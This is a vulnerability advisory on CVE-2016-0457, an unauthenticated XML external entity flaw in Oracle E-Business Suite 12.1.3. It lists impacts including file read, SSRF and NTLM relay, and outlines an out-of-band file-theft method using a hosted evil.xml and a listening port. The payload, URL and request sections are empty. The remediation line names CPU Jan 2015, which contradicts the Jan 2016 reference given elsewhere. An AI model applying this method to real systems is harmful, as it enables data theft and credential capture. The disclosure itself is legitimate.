[ERPSCAN-16-007] Oracle E-Business Suite – XXE injection vulnerability

Application: Oracle E-Business Suite
Version Affected: Oracle E-Business Suite 12.1.3, probably others
Vendor: Oracle
Bugs: XXE injection
Vendor response: 24.07.2015
Date of Public Advisory: 19.01.2016
Reference: Oracle CPU Jan 2016
Author: Nikita Kelesis, Ivan Chalykin, Alexey Tyurin

Class: XML External Entity [CWE-611]
Impact: information disclosure, DoS, SSRF, NTLM relay
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2016-0457
CVSS Information
CVSS Base Score: 5 / 10

AV: Access Vector (Related exploit range) Network (N)
AC: Access Complexity (Required attack complexity) Medium (M)
Au: Authentication (Level of authentication needed to exploit) None (N)
C: Impact to Confidentiality Partial (P)
I: Impact to Integrity Partial (P)
A: Impact to Availability Partial (P)

Oracle E-Business Suite 12.1.3 XML parser validates all incoming XML requests with a user-specified DTD.

Vulnerable packages
Oracle E-Business Suite 12.1.3
Other versions are probably affected too, but they were not checked.

Technical description
Servlet can be accessed remotely without authentication
Servlet can be used to send XML messages which will be processed via XML parser.
XML parser validates all incoming XML requests with a user-specified DTD.

An attacker sends XML request with malformed entity and can:
1) read a file in an OS (depends on process permissions)
2) perform a DoS attack
3) make an SSRF (“tunnel” to local services, internal network)
4) For Windows OS: initiate SMB/HTTP request to a hacker’s host and steal NTLM hash or perform an SMB relay attack.

Vulnerable URL:

To read a local file (universal way):
1) Run a web server with a file (evil.xml) that contains:

2) Open any port (8090, for example) and wait for the payload from victim here

3) Send the request to a victim:

It’s possible to perform the attack without external (hacker’s) server, but it is necessary to make customization of the request for every servlet’s input points.

Install Oracle CPU Jan 2015